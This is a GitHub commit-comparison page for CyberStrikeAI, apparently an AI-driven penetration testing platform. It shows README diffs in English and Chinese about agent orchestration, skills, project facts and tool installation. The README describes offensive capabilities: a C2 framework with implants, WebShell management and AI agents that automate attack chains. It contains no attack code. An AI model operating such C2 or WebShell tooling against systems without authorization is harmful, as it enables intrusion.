Compare commits

...

172 Commits

Author SHA1 Message Date
公明 47486a49c2 Update version number to v1.6.44 2026-06-23 21:17:08 +08:00
公明 476727933d Update config.yaml 2026-06-23 21:16:41 +08:00
公明 8bb50e8323 Add files via upload 2026-06-23 21:15:45 +08:00
公明 e74f2a2292 Add files via upload 2026-06-23 21:14:08 +08:00
公明 4799d0dba7 Add files via upload 2026-06-23 21:12:26 +08:00
公明 1db917061d Add files via upload 2026-06-23 21:10:47 +08:00
公明 41cd7db30f Add files via upload 2026-06-23 21:08:59 +08:00
公明 68b3265f3f Add files via upload 2026-06-23 21:07:01 +08:00
公明 05dc4395a1 Add files via upload 2026-06-23 21:06:14 +08:00
公明 637a35748b Add files via upload 2026-06-23 21:03:59 +08:00
公明 5d77a99236 Add files via upload 2026-06-23 21:01:35 +08:00
公明 e84d936f85 Add files via upload 2026-06-23 20:59:20 +08:00
公明 e748201ae8 Add files via upload 2026-06-23 20:57:47 +08:00
公明 7a3c67458c Add files via upload 2026-06-23 16:53:32 +08:00
公明 6e9e43eec8 Add files via upload 2026-06-23 15:43:15 +08:00
公明 bca86e48ae Add files via upload 2026-06-23 15:40:04 +08:00
公明 3f3b8b4db4 Add files via upload 2026-06-23 15:37:23 +08:00
公明 b366dc0287 Add files via upload 2026-06-23 15:35:12 +08:00
公明 a52452ceea Add files via upload 2026-06-23 15:32:41 +08:00
公明 5b87667782 Update config.yaml 2026-06-23 15:32:18 +08:00
公明 4f0e812d37 Add files via upload 2026-06-23 15:31:23 +08:00
公明 79691c021f Add files via upload 2026-06-23 15:09:53 +08:00
公明 5a8309a015 Add files via upload 2026-06-23 15:07:41 +08:00
公明 6244197339 Add files via upload 2026-06-23 15:06:02 +08:00
公明 eb14aca05a Add files via upload 2026-06-23 15:03:23 +08:00
公明 091e8a4da8 Add files via upload 2026-06-23 15:00:44 +08:00
公明 48ce0c519e Add files via upload 2026-06-23 12:34:50 +08:00
公明 afc37051c0 Add files via upload 2026-06-23 12:33:35 +08:00
公明 2964247361 Add files via upload 2026-06-23 12:31:05 +08:00
公明 02919df476 Add files via upload 2026-06-23 12:28:37 +08:00
公明 c3294d96a2 Add files via upload 2026-06-23 12:28:07 +08:00
公明 c8b8b41bda Add files via upload 2026-06-23 12:26:40 +08:00
公明 9a4c333b90 Add files via upload 2026-06-23 12:25:20 +08:00
公明 8e21ae290a Add files via upload 2026-06-23 12:22:50 +08:00
公明 b9d102d046 Add files via upload 2026-06-23 11:54:28 +08:00
公明 8c85494a05 Add files via upload 2026-06-23 11:52:15 +08:00
公明 c3d2a41301 Add files via upload 2026-06-23 01:54:29 +08:00
公明 1a2e282d46 Add files via upload 2026-06-23 01:39:55 +08:00
公明 8129f2147f Delete internal/multiagent/eino_empty_response_test.go 2026-06-23 01:37:34 +08:00
公明 4a9889f0af Add files via upload 2026-06-23 01:36:48 +08:00
公明 732d47a965 Add files via upload 2026-06-22 23:31:42 +08:00
公明 e22382aab0 Add files via upload 2026-06-22 23:29:57 +08:00
公明 b6ff80adf2 Add files via upload 2026-06-22 23:27:30 +08:00
公明 51f1cfde2f Add files via upload 2026-06-22 23:12:53 +08:00
公明 b2c8913014 Add files via upload 2026-06-22 17:53:52 +08:00
公明 ae98288b62 Add files via upload 2026-06-22 15:53:31 +08:00
公明 9955e856a0 Add files via upload 2026-06-22 15:48:44 +08:00
公明 018544e5f9 Add files via upload 2026-06-22 15:43:39 +08:00
公明 c1c86e4632 Add files via upload 2026-06-22 13:47:53 +08:00
公明 08d77bc12b Add files via upload 2026-06-21 01:56:48 +08:00
公明 ce73a7b3e4 Add files via upload 2026-06-21 01:55:25 +08:00
公明 f78f424aab Add files via upload 2026-06-21 01:53:55 +08:00
公明 e19d8e39bd Add files via upload 2026-06-21 01:52:14 +08:00
公明 ecf594a25b Update config.yaml 2026-06-20 20:37:48 +08:00
公明 d5759f6d83 Add files via upload 2026-06-20 19:57:07 +08:00
公明 81b3f64b15 Add files via upload 2026-06-20 19:55:32 +08:00
公明 0e0f1352f0 Add files via upload 2026-06-20 19:52:33 +08:00
公明 ffba311afd Add files via upload 2026-06-20 19:47:47 +08:00
公明 d9ed36cfb1 Add files via upload 2026-06-20 19:45:29 +08:00
公明 b7f80b78ee Add files via upload 2026-06-20 19:39:39 +08:00
公明 8f8e5cfff5 Increase rune limits in config.yaml 2026-06-20 19:37:50 +08:00
公明 120f860640 Add files via upload 2026-06-20 19:36:35 +08:00
公明 90cd119a83 Add files via upload 2026-06-20 19:35:06 +08:00
公明 56d597e0c5 Add files via upload 2026-06-20 19:31:56 +08:00
公明 11ab5cde8f Add files via upload 2026-06-20 19:28:34 +08:00
公明 46a7d338a4 Add files via upload 2026-06-20 17:25:44 +08:00
公明 46f68cc1d4 Update config.yaml 2026-06-20 16:19:57 +08:00
公明 7003cdb2e3 Add files via upload 2026-06-20 15:34:58 +08:00
公明 4e5e6208bd Add files via upload 2026-06-20 15:29:36 +08:00
公明 6a7e78a846 Add files via upload 2026-06-20 15:28:10 +08:00
公明 88c6fbfb75 Add files via upload 2026-06-20 15:26:49 +08:00
公明 1cd6d0fa90 Add files via upload 2026-06-20 15:24:40 +08:00
公明 24390db100 Add files via upload 2026-06-19 01:41:32 +08:00
公明 c000fe5195 Add files via upload 2026-06-19 01:39:53 +08:00
公明 0b4a11d01a Add files via upload 2026-06-19 01:38:30 +08:00
公明 d433e44a7d Add files via upload 2026-06-19 01:36:52 +08:00
公明 7de51fe0ea Update config.yaml 2026-06-19 00:05:50 +08:00
公明 a354cf97e5 Add files via upload 2026-06-19 00:04:38 +08:00
公明 c180f07c7e Add files via upload 2026-06-19 00:02:53 +08:00
公明 15730d3ef4 Add files via upload 2026-06-19 00:01:20 +08:00
公明 b7fa18b6d4 Add files via upload 2026-06-18 23:44:04 +08:00
公明 8d622f63ff Update version to v1.6.40 in config.yaml 2026-06-18 23:24:14 +08:00
公明 20b05146fb Add files via upload 2026-06-18 23:23:48 +08:00
公明 d8768eae76 Add files via upload 2026-06-18 23:21:58 +08:00
公明 9232cee38d Add files via upload 2026-06-18 23:20:39 +08:00
公明 6c975e63d2 Add files via upload 2026-06-18 23:19:09 +08:00
公明 e175523b82 Add files via upload 2026-06-18 23:17:30 +08:00
公明 ae23427d9e Add files via upload 2026-06-18 21:53:20 +08:00
公明 93a2504ce3 Add files via upload 2026-06-18 21:52:36 +08:00
公明 09b0479fb3 Add files via upload 2026-06-18 21:50:44 +08:00
公明 2bdc9d4fe0 Add files via upload 2026-06-18 21:48:33 +08:00
公明 01b3d8056c Add files via upload 2026-06-18 21:09:00 +08:00
公明 ed479d5e4d Update config.yaml 2026-06-18 12:53:56 +08:00
公明 a49f595231 Update config.yaml 2026-06-18 12:49:38 +08:00
公明 82cf014a5e Update config.yaml 2026-06-18 12:48:07 +08:00
公明 508de5fad0 Add files via upload 2026-06-18 12:47:24 +08:00
公明 6712344411 Add files via upload 2026-06-18 12:46:46 +08:00
公明 7eadccbff6 Add files via upload 2026-06-18 12:44:42 +08:00
公明 01b361e4a7 Add files via upload 2026-06-18 12:42:56 +08:00
公明 f6ce31c961 Delete internal/图片画质提升.jpeg 2026-06-18 12:41:18 +08:00
公明 d5a0f93c6c Add files via upload 2026-06-18 12:40:54 +08:00
公明 56faefaaf9 Add files via upload 2026-06-18 12:39:09 +08:00
公明 16e9c5874a Delete internal/图片画质提升.jpeg 2026-06-18 12:38:53 +08:00
公明 41b5cdde6b Add files via upload 2026-06-18 12:38:36 +08:00
公明 cf1f8515d9 Delete internal directory 2026-06-18 12:37:39 +08:00
公明 5e2b30c029 Add files via upload 2026-06-17 14:00:23 +08:00
公明 8c7c22369e Add files via upload 2026-06-17 12:30:20 +08:00
公明 9b1aba692b Add files via upload 2026-06-17 12:08:23 +08:00
公明 db730b48c1 Add files via upload 2026-06-17 12:06:23 +08:00
公明 dfb7dd7390 Add files via upload 2026-06-17 12:04:17 +08:00
公明 9f6eb33047 Add files via upload 2026-06-17 12:02:24 +08:00
公明 616d87f4cc Add files via upload 2026-06-17 10:50:19 +08:00
公明 8d999792b8 Update config.yaml 2026-06-16 16:22:14 +08:00
公明 afae8970d1 Add files via upload 2026-06-16 16:21:24 +08:00
公明 4d7330c5c3 Add files via upload 2026-06-16 15:48:11 +08:00
公明 8884bfb0b4 Add files via upload 2026-06-16 13:07:04 +08:00
公明 fb351c80b6 Add files via upload 2026-06-15 22:06:46 +08:00
公明 664834e338 Add files via upload 2026-06-15 22:03:29 +08:00
公明 95bf62db88 Add files via upload 2026-06-15 21:56:42 +08:00
公明 656242614d Add files via upload 2026-06-15 21:41:02 +08:00
公明 a9d6d8c00e Add files via upload 2026-06-15 21:30:39 +08:00
公明 0d6a43c0a8 Add files via upload 2026-06-15 20:43:51 +08:00
公明 702f286eb1 Add files via upload 2026-06-15 20:24:17 +08:00
公明 f4906543a8 Update config.yaml 2026-06-15 11:55:49 +08:00
公明 b073421637 Add files via upload 2026-06-15 11:55:04 +08:00
公明 08436c27aa Add files via upload 2026-06-15 11:49:53 +08:00
公明 25ce0b221f Add files via upload 2026-06-14 21:07:51 +08:00
公明 87e629f270 Add files via upload 2026-06-14 20:19:52 +08:00
公明 04f8d73b0e Add files via upload 2026-06-14 19:58:04 +08:00
公明 33e4f023b5 Add files via upload 2026-06-14 19:48:07 +08:00
公明 fc2e822448 Add files via upload 2026-06-14 19:46:13 +08:00
公明 7487c45799 Add files via upload 2026-06-14 19:43:59 +08:00
公明 6c4b3bf131 Add files via upload 2026-06-14 19:42:14 +08:00
公明 54cea1b172 Add files via upload 2026-06-13 19:56:09 +08:00
公明 b8775997e4 Add files via upload 2026-06-13 12:32:30 +08:00
公明 4223ec47f9 Add files via upload 2026-06-13 12:27:21 +08:00
公明 9887589d99 Add files via upload 2026-06-13 12:15:55 +08:00
公明 b7c01f41c7 Add files via upload 2026-06-13 12:08:04 +08:00
公明 1d3b4c44e1 Update config.yaml 2026-06-12 22:11:49 +08:00
公明 cbd64173b8 Add files via upload 2026-06-12 22:10:10 +08:00
公明 af71c6aa24 Add files via upload 2026-06-12 22:08:15 +08:00
公明 97a73a1cb6 Add files via upload 2026-06-12 22:06:41 +08:00
公明 83e1c707ca Add files via upload 2026-06-12 22:04:57 +08:00
公明 96ccbff77c Add files via upload 2026-06-12 21:28:51 +08:00
公明 c4bd8b93f6 Delete install-tools.sh 2026-06-12 21:26:22 +08:00
公明 d005268d28 Add files via upload 2026-06-12 19:43:38 +08:00
公明 7f4e8d2ad2 Add files via upload 2026-06-12 19:41:47 +08:00
公明 f3be355820 Add files via upload 2026-06-12 19:39:01 +08:00
公明 bf0ce33e3f Add files via upload 2026-06-12 19:36:45 +08:00
公明 4661862a1a Add files via upload 2026-06-11 18:03:09 +08:00
公明 f319a0f243 Add files via upload 2026-06-11 18:01:38 +08:00
公明 15c4802319 Add files via upload 2026-06-11 17:18:58 +08:00
公明 6ffde48b0c Add files via upload 2026-06-11 16:54:36 +08:00
公明 c5e2f0d95d Add files via upload 2026-06-11 16:02:48 +08:00
公明 28a826d5b7 Add files via upload 2026-06-11 15:56:25 +08:00
公明 6365de7018 Add files via upload 2026-06-11 11:50:31 +08:00
公明 2e4bf7197b Add files via upload 2026-06-11 11:48:17 +08:00
公明 ed4ba08163 Add files via upload 2026-06-11 11:46:23 +08:00
公明 8b5e55a673 Add files via upload 2026-06-11 11:44:20 +08:00
公明 e8a75e5105 Update config.yaml 2026-06-11 02:03:03 +08:00
公明 48976ed650 Add files via upload 2026-06-11 01:48:42 +08:00
公明 dc9ecae7fd Add files via upload 2026-06-11 01:43:35 +08:00
公明 a9d0a59f7a Add files via upload 2026-06-11 01:41:57 +08:00
公明 5ec4729b83 Add files via upload 2026-06-11 01:40:00 +08:00
公明 9857003018 Add files via upload 2026-06-11 01:38:25 +08:00
公明 a6e7885fed Add files via upload 2026-06-11 01:31:18 +08:00
公明 e69375451c Add files via upload 2026-06-11 01:29:07 +08:00
公明 07e7f104ad Add files via upload 2026-06-11 01:27:50 +08:00
公明 ffce9185bb Add files via upload 2026-06-11 01:16:20 +08:00
公明 612f16455d Add files via upload 2026-06-11 01:14:52 +08:00
公明 ecd5b40bc2 Add files via upload 2026-06-11 01:13:11 +08:00
公明 5aa7306c9b Update config.yaml 2026-06-11 00:53:39 +08:00
160 changed files with 25125 additions and 5248 deletions
+26 -15
View File
@@ -29,7 +29,6 @@ If CyberStrikeAI helps you, you can support the project via **WeChat Pay** or **
CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams. CyberStrikeAI is an **AI-native security testing platform** built in Go. It integrates 100+ security tools, an intelligent orchestration engine, role-based testing with predefined security roles, a skills system with specialized testing skills, comprehensive lifecycle management capabilities, and a **built-in lightweight C2 (Command & Control) framework** for **authorized** engagements (listeners, encrypted implants, sessions, tasks, real-time events, REST and MCP). Through native MCP protocol and AI agents, it enables end-to-end automation from conversational commands to vulnerability discovery, attack-chain analysis, knowledge retrieval, and result visualization—delivering an auditable, traceable, and collaborative testing environment for security teams.
## Interface & Integration Preview ## Interface & Integration Preview
<div align="center"> <div align="center">
@@ -113,13 +112,13 @@ CyberStrikeAI is an **AI-native security testing platform** built in Go. It inte
- 🔒 Password-protected web UI, audit logs, and SQLite persistence - 🔒 Password-protected web UI, audit logs, and SQLite persistence
- 📚 Knowledge base (RAG) with embedding-based vector retrieval (cosine similarity), optional **Eino Compose** indexing pipeline, and configurable post-retrieval budgets / reranking hooks - 📚 Knowledge base (RAG) with embedding-based vector retrieval (cosine similarity), optional **Eino Compose** indexing pipeline, and configurable post-retrieval budgets / reranking hooks
- 📁 Conversation grouping with pinning, rename, and batch management - 📁 Conversation grouping with pinning, rename, and batch management
- 📂 **Project management**: group conversations and vulnerabilities by project; **shared facts** (project blackboard) persist cross-session context (targets, env, auth notes) with auto-injection for agents and MCP tools (`upsert_project_fact`, `get_project_fact`, …) - 📂 **Project management**: shared facts (blackboard) across sessions, `upsert_project_fact` + `links` to chain paths; attack-chain and project fact graph views
- 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics - 🛡️ Vulnerability management with CRUD operations, severity tracking, status workflow, and statistics
- 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially - 📋 Batch task management: create task queues, add multiple tasks, and execute them sequentially
- 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions - 🎭 Role-based testing: predefined security testing roles (Penetration Testing, CTF, Web App Scanning, etc.) with custom prompts and tool restrictions
- 🧩 **Agent orchestration (CloudWeGo Eino)**: **single-agent** via **`/api/eino-agent/stream`** (Eino ADK `ChatModelAgent`); **multi-agent** via **`/api/multi-agent/stream`** with **`deep`** (coordinator + `task` sub-agents), **`plan_execute`**, or **`supervisor`** (`orchestration` in the request body). Markdown under `agents/`: `orchestrator.md`, `orchestrator-plan-execute.md`, `orchestrator-supervisor.md`, plus sub-agent `*.md` (see [Multi-agent doc](docs/MULTI_AGENT_EINO.md)) - 🧩 **Agent orchestration (CloudWeGo Eino)**: **single-agent** via **`/api/eino-agent/stream`** (Eino ADK `ChatModelAgent`); **multi-agent** via **`/api/multi-agent/stream`** with **`deep`** (coordinator + `task` sub-agents), **`plan_execute`**, or **`supervisor`** (`orchestration` in the request body). ADK **summarization** compresses long contexts; pre-compaction **transcripts** land at `data/conversation_artifacts/<conversation-id>/summarization/transcript.txt` (full user/assistant/tool turns; static system omitted). Markdown under `agents/`: `orchestrator.md`, `orchestrator-plan-execute.md`, `orchestrator-supervisor.md`, plus sub-agent `*.md` (see [Multi-agent doc](docs/MULTI_AGENT_EINO.md))
- 🖼️ **Vision analysis (`analyze_image`)**: separate VL model (e.g. `qwen-vl-max`) via MCP for local screenshots, captchas, and UI; image bytes stay out of agent history (text summaries only). Configure `vision` in `config.yaml`; see [docs/VISION.md](docs/VISION.md) - 🖼️ **Vision analysis (`analyze_image`)**: separate VL model (e.g. `qwen-vl-max`) via MCP for local screenshots, captchas, and UI; image bytes stay out of agent history (text summaries only). Configure `vision` in `config.yaml`; see [docs/VISION.md](docs/VISION.md)
- 🎯 **Skills (refactored for Eino)**: packs under `skills_dir` follow **Agent Skills** layout (`SKILL.md` + optional files); **multi-agent** sessions use the official Eino ADK **`skill`** tool for **progressive disclosure** (load by name), with optional **host filesystem / shell** via `multi_agent.eino_skills`; optional **`eino_middleware`** adds patchtoolcalls, tool_search, plantask, reduction, checkpoints, and Deep tuning—20+ sample domains (SQLi, XSS, API security, …) ship under `skills/` - 🎯 **Skills (refactored for Eino)**: packs under `skills_dir` follow **Agent Skills** layout (`SKILL.md` + optional files); **multi-agent** sessions use the official Eino ADK **`skill`** tool for **progressive disclosure** (load by name), with optional **host filesystem / shell** via `multi_agent.eino_skills`; optional **`eino_middleware`** adds patchtoolcalls, tool_search, **plantask** (`TaskCreate` / `TaskList` boards under `skills_dir/.eino/plantask/`), reduction, file **checkpoints** (`checkpoint_dir`), ChatModel **retries**, session **output key**, and Deep tuning—20+ sample domains (SQLi, XSS, API security, …) ship under `skills/`
- 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands) - 📱 **Chatbot**: DingTalk and Lark (Feishu) long-lived connections so you can talk to CyberStrikeAI from mobile (see [Robot / Chatbot guide](docs/robot_en.md) for setup and commands)
- 🧑‍⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals - 🧑‍⚖️ **Human-in-the-loop (HITL)**: Chat sidebar to set approval mode and tool allowlists (listed tools skip approval); global list in `config.yaml` under `hitl.tool_whitelist`; **Apply** can merge new tools into the file and update the running server without restart; dedicated **HITL** page for pending approvals
- 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter. - 🐚 **WebShell management**: Add and manage WebShell connections (e.g. IceSword/AntSword compatible), use a virtual terminal for command execution, a built-in file manager for file operations, and an AI assistant tab that orchestrates tests and keeps per-connection conversation history; supports PHP, ASP, ASPX, JSP and custom shell types with configurable request method and command parameter.
@@ -190,15 +189,21 @@ The `run.sh` script will automatically:
``` ```
- Or edit `config.yaml` directly before launching - Or edit `config.yaml` directly before launching
2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`) 2. **Login** - Use the auto-generated password shown in the console (or set `auth.password` in `config.yaml`)
3. **Install security tools (optional)** - Install all tools declared under `tools/`: 3. **Install security tools (optional)** - Install tools from `tools/` as needed; missing tools are skipped or substituted at runtime. Common examples:
**macOS (Homebrew):**
```bash ```bash
./install-tools.sh # install missing tools (best on Kali/Debian/Ubuntu) brew install nmap masscan sqlmap nikto gobuster ffuf hydra hashcat nuclei subfinder
./install-tools.sh --check # check only, no install
./install-tools.sh --list # show per-tool status
./install-tools.sh --only nmap,gau # install selected tools only
``` ```
On macOS, install bash 4+ via Homebrew first; without apt, the script falls back to pip/go/GitHub.
AI automatically falls back to alternatives when a tool is missing. **Linux (Kali / Debian / Ubuntu):**
```bash
sudo apt update
sudo apt install -y nmap masscan sqlmap nikto gobuster hydra hashcat john binwalk
# On some distros, install ffuf/nuclei/subfinder via go install or upstream docs
```
See the `tools/` directory for the full list; refer to each tool's official docs for install details.
**Alternative Launch Methods:** **Alternative Launch Methods:**
```bash ```bash
@@ -261,7 +266,7 @@ Requirements / tips:
- **Predefined roles** System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory. - **Predefined roles** System includes 12+ predefined security testing roles (Penetration Testing, CTF, Web App Scanning, API Security Testing, Binary Analysis, Cloud Security Audit, etc.) in the `roles/` directory.
- **Custom prompts** Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas. - **Custom prompts** Each role can define a `user_prompt` that prepends to user messages, guiding the AI to adopt specialized testing methodologies and focus areas.
- **Tool restrictions** Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities). - **Tool restrictions** Roles can specify a `tools` list to limit available tools, ensuring focused testing workflows (e.g., CTF role restricts to CTF-specific utilities).
- **Skills** Skill packs live under `skills_dir` and load via the Eino ADK **`skill`** tool (**progressive disclosure**) in both **single- and multi-agent** sessions when **`multi_agent.eino_skills`** is enabled. Optional host **read_file / glob / grep / write / edit / execute** and **`eino_middleware`** (tool_search, reduction, checkpoints, etc.) apply per mode—see docs. - **Skills** Skill packs live under `skills_dir` and load via the Eino ADK **`skill`** tool (**progressive disclosure**) in both **single- and multi-agent** sessions when **`multi_agent.eino_skills`** is enabled. Optional host **read_file / glob / grep / write / edit / execute** and **`eino_middleware`** (tool_search, plantask, reduction, checkpoints, summarization transcripts, etc.) apply per mode—see docs.
- **Easy role creation** Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields. - **Easy role creation** Create custom roles by adding YAML files to the `roles/` directory. Each role defines `name`, `description`, `user_prompt`, `icon`, `tools`, and `enabled` fields.
- **Web UI integration** Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions. - **Web UI integration** Select roles from a dropdown in the chat interface. Role selection affects both AI behavior and available tool suggestions.
@@ -289,6 +294,7 @@ Requirements / tips:
- **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only. - **Sub-agents** (for **deep** / **supervisor**): other `*.md` files (YAML front matter + body). Not used as **`task`** targets if marked orchestrator-only.
- **Management** Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`. - **Management** Web UI: **Agents → Agent management**; API `/api/multi-agent/markdown-agents`.
- **Config** `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning). - **Config** `multi_agent` in `config.yaml`: `enabled`, `robot_default_agent_mode`, `batch_use_multi_agent`, `max_iteration`, `plan_execute_loop_max_iterations`, per-mode orchestrator instruction fields, optional YAML `sub_agents` merged with disk (`id` clash → Markdown wins), **`eino_skills`**, **`eino_middleware`** (optional ADK middleware and Deep/Supervisor tuning).
- **Resilience & long runs** `checkpoint_dir` enables ADK **resume** after process crashes (distinct from trace-based “interrupt & continue”). `deep_model_retry_max_retries` retries transient LLM API failures within a single call. **Summarization** writes a filtered **transcript** when compression fires; the summary message includes the path so the model can `read_file` for scan output and other pre-compaction details.
- **Details** **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats). - **Details** **[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)** (streaming, robots, batch, middleware caveats).
### Skills System (Agent Skills + Eino) ### Skills System (Agent Skills + Eino)
@@ -296,7 +302,7 @@ Requirements / tips:
- **Runtime refactor** **`skills_dir`** is the single root for packs. **Multi-agent** loads them through Einos official **`skill`** middleware (**progressive disclosure**: model calls `skill` with a pack **name** instead of receiving full SKILL text up front). Configure via **`multi_agent.eino_skills`**: `disable`, `filesystem_tools` (host read/glob/grep/write/edit/execute), `skill_tool_name`. - **Runtime refactor** **`skills_dir`** is the single root for packs. **Multi-agent** loads them through Einos official **`skill`** middleware (**progressive disclosure**: model calls `skill` with a pack **name** instead of receiving full SKILL text up front). Configure via **`multi_agent.eino_skills`**: `disable`, `filesystem_tools` (host read/glob/grep/write/edit/execute), `skill_tool_name`.
- **Eino / RAG** Packages are also split into `schema.Document` chunks for `FilesystemSkillsRetriever` (`skills.AsEinoRetriever()`) in **compose** graphs (e.g. knowledge/indexing pipelines). - **Eino / RAG** Packages are also split into `schema.Document` chunks for `FilesystemSkillsRetriever` (`skills.AsEinoRetriever()`) in **compose** graphs (e.g. knowledge/indexing pipelines).
- **HTTP API** `/api/skills` listing and `depth` (`summary` | `full`), `section`, and `resource_path` remain for the web UI and ops; **model-side** skill loading in multi-agent uses the **`skill`** tool, not MCP. - **HTTP API** `/api/skills` listing and `depth` (`summary` | `full`), `section`, and `resource_path` remain for the web UI and ops; **model-side** skill loading in multi-agent uses the **`skill`** tool, not MCP.
- **Optional `eino_middleware`** e.g. `tool_search` (dynamic MCP tool list), `patch_tool_calls`, `plantask` (structured tasks; persistence defaults under a subdirectory of `skills_dir`), `reduction`, `checkpoint_dir`, Deep output key / model retries / task-tool description prefix—see `config.yaml` and `internal/config/config.go`. - **Optional `eino_middleware`** e.g. `tool_search` (dynamic MCP tool list), `patch_tool_calls`, **`plantask`** (Eino `TaskCreate` / `TaskGet` / `TaskUpdate` / `TaskList`; JSON under `skills_dir/.eino/plantask/<conversation-id>/`; Eino clears task files when **all** tasks are marked completed), `reduction`, **`checkpoint_dir`** (`data/eino-checkpoints/`), **`deep_model_retry_max_retries`**, **`deep_output_key`**, task-tool description prefix—see `config.yaml` and `internal/config/config.go`.
- **Shipped demo** `skills/cyberstrike-eino-demo/`; see `skills/README.md`. - **Shipped demo** `skills/cyberstrike-eino-demo/`; see `skills/README.md`.
**Creating a skill:** **Creating a skill:**
@@ -306,7 +312,7 @@ Requirements / tips:
### Tool Orchestration & Extensions ### Tool Orchestration & Extensions
- **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata. - **YAML recipes** in `tools/*.yaml` describe commands, arguments, prompts, and metadata.
- **Directory hot-reload** pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments. - **Directory hot-reload** pointing `security.tools_dir` to a folder is usually enough; inline definitions in `config.yaml` remain supported for quick experiments.
- **Large-result pagination** outputs beyond 200 KB are stored as artifacts retrievable through the `query_execution_result` tool with paging, filters, and regex search. - **Large tool outputs** outputs beyond `reduction_max_length_for_trunc` are summarized via Eino reduction with full content persisted under `tmp/reduction/`; use `read_file` on the path in `<persisted-output>`.
- **Result compression** multi-megabyte logs can be summarized or losslessly compressed before persisting to keep SQLite lean. - **Result compression** multi-megabyte logs can be summarized or losslessly compressed before persisting to keep SQLite lean.
**Creating a custom tool (typical flow)** **Creating a custom tool (typical flow)**
@@ -544,7 +550,12 @@ multi_agent:
orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty orchestrator_instruction: "" # Deep; used when orchestrator.md body is empty
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional # orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor optional
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill } # eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
# eino_middleware: optional patch_tool_calls, tool_search, plantask, reduction, checkpoint_dir, ... # eino_middleware: plantask_enable, checkpoint_dir, deep_model_retry_max_retries, deep_output_key, ...
project:
enabled: true # Enable project blackboard & fact MCP tools
fact_index_max_runes: 65000
fact_summary_max_runes: 24000
default_inject_deprecated: false
``` ```
### Tool Definition Example (`tools/nmap.yaml`) ### Tool Definition Example (`tools/nmap.yaml`)
+26 -15
View File
@@ -28,7 +28,6 @@
CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景****内置轻量 C2Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。 CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集成了 100+ 安全工具、智能编排引擎、角色化测试与预设安全测试角色、Skills 技能系统与专业测试技能、完整的测试生命周期管理能力,以及面向 **授权场景****内置轻量 C2Command & Control,指挥与控制)** 能力(监听器、加密通信、会话与任务、实时事件、REST 与 MCP 协同)。通过原生 MCP 协议与 AI 智能体,支持从对话指令到漏洞发现、攻击链分析、知识检索与结果可视化的全流程自动化,为安全团队提供可审计、可追溯、可协作的专业测试环境。
## 界面与集成预览 ## 界面与集成预览
<div align="center"> <div align="center">
@@ -112,13 +111,13 @@ CyberStrikeAI 是一款 **AI 原生安全测试平台**,基于 Go 构建,集
- 🔒 Web 登录保护、审计日志、SQLite 持久化 - 🔒 Web 登录保护、审计日志、SQLite 持久化
- 📚 知识库(RAG):向量嵌入与余弦相似度检索(与 Eino `retriever.Retriever` 语义一致),可选 **Eino Compose** 索引流水线及检索后处理(预算、重排等配置项) - 📚 知识库(RAG):向量嵌入与余弦相似度检索(与 Eino `retriever.Retriever` 语义一致),可选 **Eino Compose** 索引流水线及检索后处理(预算、重排等配置项)
- 📁 对话分组管理:支持分组创建、置顶、重命名、删除等操作 - 📁 对话分组管理:支持分组创建、置顶、重命名、删除等操作
